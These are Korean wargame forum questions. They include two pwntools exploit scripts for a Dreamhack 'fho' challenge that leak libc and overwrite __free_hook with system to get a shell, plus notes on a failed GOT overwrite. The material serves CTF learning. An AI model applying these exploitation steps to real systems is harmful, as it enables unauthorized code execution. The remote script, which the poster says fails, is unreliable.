Write() 함수를 통해서 stdout의 주소를 출력해서 libc 릭하는 것까지 했습니다. 그 다음에 puts의 got를 main 함수의 주소로 덮어서 입력을 반복할 수 있게 만들었습니다. (main 함수의 다른 오프셋으로 점프하면 스택 정렬이 깨지면서 바이너리가 종료되어서 무조건 main 함수의 시작 주소로 점프를 하게 되었습니다.) 두 번째 페이로드를 통해 puts_got의 원 가젯의 주소를 덮어서 쉘을 획득하려고 하였습니다. 하지만 입력가능한 크기보다 주소의 크기가 너무 커서 한번에는 힘들다는 것을 알고 여러 시도를 하였습니다. main 함수의 Init이 실행되지 않게 해서 val 변수에 값을 계속 누적시키는 방법 -> 실패: main 함수의 다른 오프셋으로 puts의 got를 덮어서 실행흐름을 조작하면 SIGSEV 발생. 값이 초기화 되지 메모리 공간에 값을 누적시킨 다음에 Write() 함수를 통해서 값을 쓰는 방법 -> 실패: Write() 함수의 *ptr = val; 라는 코드로는 불가능 임의 주소를 역참조해서 그 값을 *ptr에 저장하는 코드가 있어야함. 어떻게 libc 주소를 써야할지 모르겠습니다. 조금만 힌트를 주시면 감사하겠습니다.

(int) 일 때 첫자리가 숫자가 아니라면 0으로 바뀌는 것은 알겠습니다. 그러나 만약 랜덤으로 생성된 $charaters가 전부 숫자로 이루어진다면 $id를 어떤 식으로 알아낼 수 있나요?

1. 익스플로잇 코드 1-1. 로컬 from pwn import * libc_start_main_offset = 0x21ba0+231 system_offset = 0x4f420 # binsh_offset = 0x1b3d88 free_hook_offset = 0x3ed8e8 log.contect_level = 'debug' p = process("./fho") LibcLeakGarbage = b'a'*(0x40+0x8) #buffer+sfp pause() p.send(LibcLeakGarbage) p.recvuntil("Buf: ") p.recvuntil("Buf: ") p.recv(0x40+0x08) Libc = int.from_bytes(p.recv(6), byteorder='little') print("main ret addr : " + hex(Libc)) libc_base = Libc-libc_start_main_offset system_addr = libc_base + system_offset binsh_addr = libc_base + binsh_offset free_hook_addr = libc_base + free_hook_offset print("system addr : " + hex(system_addr)) print("binsh_addr : " + hex(binsh_addr)) print("free_hook_addr : " + hex(free_hook_addr)) p.recvuntil("To write: ") pause() p.sendline(str(free_hook_addr)) p.recvuntil("With:") pause() p.sendline(str(system_addr)) p.recvuntil("free:") pause() p.sendline(str(binsh_addr)) p.interactive() 1-2. 원격지 from pwn import * log.contect_level = 'debug' libc = ELF("./libc6-x32_2.21-0ubuntu4.3_i386.so") p = remote("host3.dreamhack.games", *) LibcLeakGarbage = b'a'*(0x40+0x8) #buffer+sfp pause() p.send(LibcLeakGarbage) p.recvuntil("Buf: ") p.recvuntil("Buf: ") p.recv(0x40+0x08) Libc = int.from_bytes(p.recv(6), byteorder='little') #u64(p.recvline()[:-1] + b'\x00'*2) print("main ret addr : " + hex(Libc)) libc_base = Libc-(libc.symbols['__libc_start_main'] + 231) system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + libc.symbols['__free_hook'] free_hook_addr = libc_base + libc.symbols['__free_hook'] print("libc_start_main_now : " + hex(Libc)) print("libc_start_main : " + hex(libc_base)) print("system addr : " + hex(system_addr)) print("binsh_addr : " + hex(binsh_addr)) print("free_hook_addr : " + hex(free_hook_addr)) p.recvuntil("To write: ") pause() p.sendline(str(free_hook_addr)) p.recvuntil("With: ") pause() p.sendline(str(system_addr)) pause() p.sendline(str(binsh_addr)) p.interactive() 2. 질문 사항 1-1의 코드로 로컬에선 익스가 가능한데, 1-2의 코드로 원격지에선 익스가 불가능합니다. 어떻게 해결하면 좋을까요? 2-1. 시도해본 것 docker과 워게임의 libc 버전이 다를 수도 있단 생각이 들어서, ret의 libc_start_main을 leak한 후 https://libc.blukat.me/ 의 libc database에서 하위 1.5byte에 부합하는 몇 가지 libc 버전을 추렸습니다. 이후 1-2 코드의 5 line에 각 so 파일을 전부 대입해봤지만 익스되지 않았습니다. fho 바이너리를 docker가 아닌 host wsl의 pwndbg로 뜯어봤을 때, docker에선 ret에 libc_start_main+231이 아닌 libc_start_call_main+128이 들어있는 걸 볼 수 있었습니다. 따라서 바이너리가 위치한 os 버전에 따라 ret에 적힌 주소가 libc_start_main이 아닐 수도 있고, 혹은 맞긴하지만 offset이 231이 아닐 수도 있단 생각이 들었습니다. 그러나 1-1과 1-2 모두 중간까지 실행하고 출력값을 봤을때, libc_base의 하위 1.5byte가 0으로 채워져 있었기에 ret가 libc_start_main+231인 것은 거의 확실하다고 생각하여 해당 가능성은 폐지했습니다.